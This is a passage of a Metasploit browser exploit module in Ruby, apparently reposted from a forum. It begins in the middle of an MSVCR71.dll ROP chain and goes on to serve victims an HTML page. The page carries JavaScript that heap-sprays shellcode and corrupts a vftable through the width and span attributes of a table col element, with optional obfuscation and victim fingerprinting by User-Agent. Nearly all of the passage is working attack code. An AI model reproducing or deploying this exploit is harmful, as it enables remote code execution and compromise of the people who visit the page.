; retn [MSVCR71.dll] 0x7c345c30 # ptr to 'push esp; ret ' [MSVCR71.dll] ].pack("V*") end code = rop + code return code end def on_request_uri(cli, request) agent = request.headers['User-Agent'] my_target = get_target(agent) # Avoid the attack if the victim doesn't have the same setup we're targeting if my_target.nil? print_error("Browser not supported: #{agent}") send_not_found(cli) return end js_code = Rex::Text.to_unescape(get_payload(my_target), Rex::Arch.endian(target.arch)) table_builder = '' 0.upto(132) do |i| table_builder << "<table style=\"table-layout:fixed\" ><col id=\"#{i}\" width=\"41\" span=\"9\" > </col></table>" end # About smash_vtable(): # * smash the vftable 0x07070024 # * span => the amount to overwrite js_element_id = Rex::Text.rand_text_alpha(4) spray_trigger_js = <<-JS var dap = "EEEE"; while ( dap.length < 480 ) dap += dap; var padding = "AAAA"; while ( padding.length < 480 ) padding += padding; var filler = "BBBB"; while ( filler.length < 480 ) filler += filler; var arr = new Array(); var rra = new Array(); var div_container = document.getElementById("#{js_element_id}"); div_container.style.cssText = "display:none"; for (var i=0; i < 500; i+=2) { rra[i] = dap.substring(0, (0x100-6)/2); arr[i] = padding.substring(0, (0x100-6)/2); arr[i+1] = filler.substring(0, (0x100-6)/2); var obj = document.createElement("button"); div_container.appendChild(obj); } for (var i=200; i<500; i+=2 ) { rra[i] = null; CollectGarbage(); } function heap_spray(){ CollectGarbage(); var shellcode = unescape("#{js_code}"); while (shellcode.length < 100000) shellcode = shellcode + shellcode; var onemeg = shellcode.substr(0, 64*1024/2); for (i=0; i<14; i++) { onemeg += shellcode.substr(0, 64*1024/2); } onemeg += shellcode.substr(0, (64*1024/2)-(38/2)); var spray = new Array(); for (i=0; i<400; i++) { spray[i] = onemeg.substr(0, onemeg.length); } } function smash_vtable(){ var obj_col_0 = document.getElementById("132"); obj_col_0.width = "1178993"; obj_col_0.span = "44"; } setTimeout(function(){heap_spray()}, 400); setTimeout(function(){smash_vtable()}, 700); JS if datastore['OBFUSCATE'] spray_trigger_js = ::Rex::Exploitation::JSObfu.new(spray_trigger_js) spray_trigger_js.obfuscate end # build html content = <<-HTML <html> <body> <div id="#{js_element_id}"></div> #{table_builder} <script language='javascript'> #{spray_trigger_js} </script> </body> </html> HTML print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...") # Transmit the response to the client send_response_html(cli, content) end end Sursa